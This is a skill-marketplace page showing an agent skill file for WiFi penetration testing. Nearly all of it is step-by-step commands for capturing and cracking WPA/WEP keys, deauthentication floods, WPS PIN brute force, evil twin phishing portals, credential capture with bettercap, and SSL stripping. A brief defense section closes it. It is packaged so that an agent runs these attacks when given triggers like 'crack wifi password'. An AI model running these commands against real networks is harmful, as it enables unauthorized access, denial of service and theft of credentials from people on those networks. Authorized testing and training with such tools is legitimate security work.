Skip to main content

wireless-security-wifi-pentest

Wireless security penetration testing with aircrack-ng, WEP/WPA/WPA2/WPA3 attacks, and 802.11 exploitation

Zur Installation springen

Quellinformationen

Repository
reason-machines/security-skills
Letzte Quellaktivität
30. Juli 2026 um 12:39
Erkannte Sprache von SKILL.md
Englisch
Sterne
12
Forks
1

Installationsoptionen

Standardmäßig ist der Prompt ausgewählt, der zuerst die Quelle prüft. Sie können zu einem direkten Befehl wechseln oder eine lokale Kopie herunterladen.

Quelldateien prüfen

Lesen Sie SKILL.md und alle von SkillsMP angezeigten Begleitdateien, bevor Sie sich für eine Installation entscheiden.

SKILL.md wird angezeigt

SKILL.md
Quellanweisungen · Schreibgeschützte Vorschau
name
wireless-security-wifi-pentest
description
Wireless security penetration testing with aircrack-ng, WEP/WPA/WPA2/WPA3 attacks, and 802.11 exploitation
triggers
["crack wifi password","capture wpa handshake","perform deauth attack","test wireless security","setup monitor mode adapter","create evil twin access point","crack wep encryption","wireless penetration testing"]
# Wireless Security & WiFi Penetration Testing > Skill by [ara.so](https://ara.so) — Security Skills collection. Expert-level wireless security penetration testing using aircrack-ng suite, handshake capture, WEP/WPA/WPA2/WPA3 cracking, rogue AP deployment, and 802.11 exploitation techniques. This skill covers reconnaissance, attack execution, and defensive mitigation for wireless networks. ## What This Skill Covers - **802.11 fundamentals**: Frame types, encryption protocols (WEP, WPA, WPA2, WPA3), authentication mechanisms - **Adapter configuration**: Monitor mode setup, packet injection testing, chipset compatibility - **Reconnaissance**: Network discovery, hidden SSID enumeration, client enumeration, traffic analysis - **WEP attacks**: IVS capture, PTW attack, fragmentation, Chop-Chop, Caffe Latte - **WPA/WPA2 attacks**: Handshake capture, deauthentication, PMKID extraction, dictionary/GPU cracking - **WPA3 exploitation**: Downgrade attacks, Dragonblood vulnerabilities - **Rogue AP attacks**: Evil twin deployment, captive portals, wireless MITM - **Enterprise WPA**: EAP/RADIUS assessment, certificate validation bypass - **Detection & defense**: WIDS configuration, management frame protection, hardening recommendations ## Prerequisites ### Hardware Requirements - **Injection-capable wireless adapter** (Atheros AR9271 or Ralink RT3070/RT5372 chipset) - TP-Link TL-WN722N v1 (Atheros AR9271) ✅ - Alfa AWUS036NHA (Atheros AR9271) ✅ - Panda PAU05 (Ralink RT5372) ✅ - **Avoid**: TL-WN722N v2/v3 (Realtek, no injection support) - **Test access point** you own and control - **Client device** for handshake generation - **Kali Linux** (bare-metal or VM with USB passthrough) ### Software Stack ```bash # Verify Kali includes core tools (pre-installed) which aircrack-ng airodump-ng aireplay-ng airbase-ng # Install additional tools sudo apt update sudo apt install -y \ hashcat hcxdumptool hcxtools \ reaver bully wash \ hostapd dnsmasq \ kismet wireshark-qt \ bettercap wifiphisher ``` ## Adapter Setup & Monitor Mode ### Identify Wireless Interface ```bash # List wireless interfaces iwconfig ip link show # Check interface details iw dev # Verify chipset (Atheros/Ralink preferred) lsusb lspci | grep -i wireless ``` ### Enable Monitor Mode ```bash # Method 1: Using airmon-ng (recommended) sudo airmon-ng check kill # Kill interfering processes sudo airmon-ng start wlan0 # Creates wlan0mon # Method 2: Manual setup sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up # Verify monitor mode iwconfig wlan0mon # Should show "Mode:Monitor" ``` ### Test Packet Injection ```bash # Critical test before attacks sudo aireplay-ng --test wlan0mon # Expected output: # Injection is working! # Found X APs # Trying broadcast probe requests... # Injection is working! # Test against specific AP sudo aireplay-ng --test -a 00:11:22:33:44:55 wlan0mon ``` ### Set Regulatory Domain & Channel ```bash # Check current regulatory domain iw reg get # Set domain (affects power/channels) sudo iw reg set US # or GB, DE, etc. # Set specific channel sudo iw dev wlan0mon set channel 6 # Set frequency (alternative) sudo iw dev wlan0mon set freq 2437 # Channel 6 = 2437 MHz ``` ## Reconnaissance & Network Discovery ### Basic Network Scan ```bash # Scan all channels, all encryption types sudo airodump-ng wlan0mon # Scan specific channel sudo airodump-ng -c 6 wlan0mon # Scan specific band sudo airodump-ng --band a wlan0mon # 5 GHz only sudo airodump-ng --band bg wlan0mon # 2.4 GHz only # Save to file sudo airodump-ng -w scan_output --output-format pcap,csv wlan0mon ``` ### Target Specific Network ```bash # Focus on single BSSID sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w target wlan0mon # Show only clients (stations) sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 --showack wlan0mon ``` ### Hidden SSID Discovery ```bash # Passive: Wait for client probe/association sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 wlan0mon # Active: Deauth client to force reassociation (reveals SSID) sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon ``` ### Client Enumeration with Kismet ```bash # Start Kismet server sudo kismet -c wlan0mon # Web UI: http://localhost:2501 # First run: create admin user # CLI query connected clients kismet_client --list-clients --server localhost:2501 ``` ## WPA/WPA2 Handshake Capture ### Capture 4-Way Handshake ```bash # Terminal 1: Start capture on target channel sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon # Terminal 2: Deauth client to force reauthentication sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon # -a = AP BSSID # -c = Client MAC (optional, omit to deauth all clients) # 10 = number of deauth packets # Look for "WPA handshake: 00:11:22:33:44:55" in airodump-ng output ``` ### Verify Handshake Capture ```bash # Check for valid handshake in capture file sudo aircrack-ng capture-01.cap # Output should show: # 1 handshake # Alternative verification with tshark tshark -r capture-01.cap -Y "eapol" | grep -i handshake ``` ### Convert Handshake for Hashcat ```bash # Extract handshake to hashcat format sudo aircrack-ng -J output capture-01.cap # Creates output.hccapx (hashcat 3.6+) # Modern method with hcxpcapngtool (hashcat 6.0+) hcxpcapngtool -o output.22000 capture-01.cap # Creates output.22000 (WPA*01/02 hash format) ``` ## PMKID Attack (Clientless WPA/WPA2) ### Capture PMKID ```bash # Modern method with hcxdumptool (no deauth needed) sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 # Let run for 2-5 minutes, Ctrl+C to stop # Convert to hashcat format hcxpcapngtool -o pmkid.22000 pmkid.pcapng # Verify PMKID present grep -c "22000" pmkid.22000 ``` ## WPA/WPA2 Cracking ### Dictionary Attack with Aircrack-ng ```bash # Crack using wordlist sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap # Specify BSSID if multiple networks in capture sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap # Show cracking progress # KEY FOUND! [ password123 ] ``` ### GPU Cracking with Hashcat ```bash # WPA/WPA2 handshake (mode 22000) hashcat -m 22000 -a 0 output.22000 /usr/share/wordlists/rockyou.txt # PMKID (mode 22000) hashcat -m 22000 pmkid.22000 wordlist.txt # With rules for mutations hashcat -m 22000 -a 0 output.22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule # Mask attack (brute-force patterns) hashcat -m 22000 -a 3 output.22000 ?d?d?d?d?d?d?d?d # ?d = digit, ?l = lowercase, ?u = uppercase, ?s = special # Show cracked passwords hashcat -m 22000 output.22000 --show ``` ### Precomputed Rainbow Tables (Cowpatty) ```bash # Generate rainbow table for SSID genpmk -f wordlist.txt -d pmk_database.db -s "TargetSSID" # Crack using precomputed table (instant if password in table) cowpatty -d pmk_database.db -r capture-01.cap -s "TargetSSID" ``` ## WEP Cracking ### Passive IVS Collection (PTW Attack) ```bash # Capture IVs on busy network sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_capture wlan0mon # Wait for 40,000+ IVs (Data column in airodump) # Then crack: sudo aircrack-ng wep_capture-01.cap # KEY FOUND! [ XX:XX:XX:XX:XX ] (ASCII: "wepkey") ``` ### Active ARP Replay Attack ```bash # Terminal 1: Capture sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_arp wlan0mon # Terminal 2: Fake authentication sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # Terminal 3: Wait for ARP packet, then replay sudo aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # IVs accumulate rapidly (1000+/sec) # Once 40K+ IVs collected, crack as above ``` ### Fragmentation Attack (No Clients) ```bash # Fake auth sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # Obtain keystream with fragmentation sudo aireplay-ng --fragment -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # Use keystream to forge ARP packet sudo packetforge-ng --arp -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF -k 192.168.1.1 -l 192.168.1.2 -y fragment-*.xor -w arp_packet # Inject forged packet sudo aireplay-ng --interactive -r arp_packet wlan0mon ``` ## Deauthentication & DoS Attacks ### Deauth Single Client ```bash # Targeted deauth sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon # 0 = infinite deauth packets (Ctrl+C to stop) ``` ### Deauth All Clients (Network DoS) ```bash # Broadcast deauth (affects all clients) sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 wlan0mon # With reason code sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 --reason 7 wlan0mon ``` ### MDK4 Beacon Flood ```bash # Flood with fake APs (WLAN DoS) sudo mdk4 wlan0mon b -a -m # Deauth flood sudo mdk4 wlan0mon d -b /path/to/blacklist.txt ``` ## Evil Twin & Rogue AP Attacks ### Basic Evil Twin with Hostapd ```bash # Create hostapd config cat > evil_twin.conf << EOF interface=wlan0 driver=nl80211 ssid=TargetSSID hw_mode=g channel=6 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=12345678 wpa_key_mgmt=WPA-PSK rsn_pairwise=CCMP EOF # Start evil twin AP sudo hostapd evil_twin.conf # In another terminal, assign IP and run DHCP sudo ip addr add 192.168.1.1/24 dev wlan0 sudo dnsmasq -C /dev/null -kd -F 192.168.1.10,192.168.1.100 -i wlan0 --bind-dynamic ``` ### Wifiphisher Automated Evil Twin ```bash # Automatic evil twin + phishing portal sudo wifiphisher -aI wlan0mon -eI eth0 -p firmware-upgrade # Common phishing scenarios: # -p firmware-upgrade # -p oauth-login # -p browser-plugin-update ``` ### Capture Credentials with Bettercap ```bash # Start bettercap sudo bettercap -iface wlan0 # In bettercap console: > set wifi.interface wlan0mon > wifi.recon on > wifi.ap.ssid "TargetSSID" > wifi.ap.bssid 00:11:22:33:44:55 > wifi.ap.channel 6 > set http.proxy.sslstrip true > set net.sniff.verbose true > http.proxy on > net.sniff on # Captures credentials, cookies, traffic ``` ## WPS Attacks ### WPS PIN Brute Force with Reaver ```bash # Check WPS enabled sudo wash -i wlan0mon # Reaver attack sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv # With delay to avoid rate limiting sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -d 5 -T 0.5 -N # Pixie Dust attack (offline, fast) sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -K ``` ### Bully WPS Attack ```bash # Standard attack sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6 # Pixie Dust sudo bully wlan0mon -b 00:11:22:33:44:55 -d -v 3 ``` ## Enterprise WPA (EAP/RADIUS) Assessment ### Enumerate EAP Methods ```bash # Use eapmd5pass or EAPHammer git clone https://github.com/s0lst1c3/eaphammer.git cd eaphammer ./eaphammer --certs --eap-spray # Identify EAP type in captured traffic tshark -r capture.pcap -Y "eap" -T fields -e eap.type | sort -u ``` ### Certificate Validation Bypass ```bash # Rogue RADIUS with EAPHammer sudo ./eaphammer \ --interface wlan0 \ --essid "EnterpriseSSID" \ --creds \ --auth wpa-eap # Captures credentials when clients ignore cert warnings ``` ## WPA3 & Advanced Attacks ### WPA3 Downgrade Attack ```bash # Force WPA3 AP to WPA2 transition mode sudo mdk4 wlan0mon d -a 00:11:22:33:44:55 # Or use hostapd-wpe with transition mode disabled ``` ### Dragonblood (CVE-2019-13377) ```bash # Test for Dragonblood vulnerability git clone https://github.com/vanhoefm/dragonslayer.git cd dragonslayer ./dragonslayer.py --test wlan0mon --bssid 00:11:22:33:44:55 ``` ## Traffic Analysis & MITM ### Capture & Decrypt WPA Traffic ```bash # Capture traffic sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w traffic wlan0mon # After obtaining PSK, decrypt in Wireshark: # Edit → Preferences → Protocols → IEEE 802.11 # Enable decryption, add key: # wpa-pwd:password123:SSID ``` ### SSL Strip & Traffic Sniffing ```bash # Route traffic through attacker (on rogue AP) sudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # SSL strip with sslstrip sudo sslstrip -l 8080 sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 # View captured credentials tail -f /var/log/sslstrip.log ``` ## Detection & Defense ### Management Frame Protection (802.11w) ```bash # Enable in hostapd.conf ieee80211w=2 # Required # Protects against deauth/disassociation attacks ``` ### Wireless IDS with Kismet ```bash # Configure alerts in kismet.conf alert=DEAUTHFLOOD,5/min,Deauthentication DoS alert=DISCONFLOOD,5/min,Disassociation DoS alert=BSSTIMESTAMP,10/min,Evil Twin Detected # Monitor for rogue APs sudo kismet -c wlan0mon --daemonize ```
Auf GitHub ansehen
Diese SKILL.md ist sehr gross, daher zeigt SkillsMP hier nur den ersten Abschnitt. Auf GitHub ansehen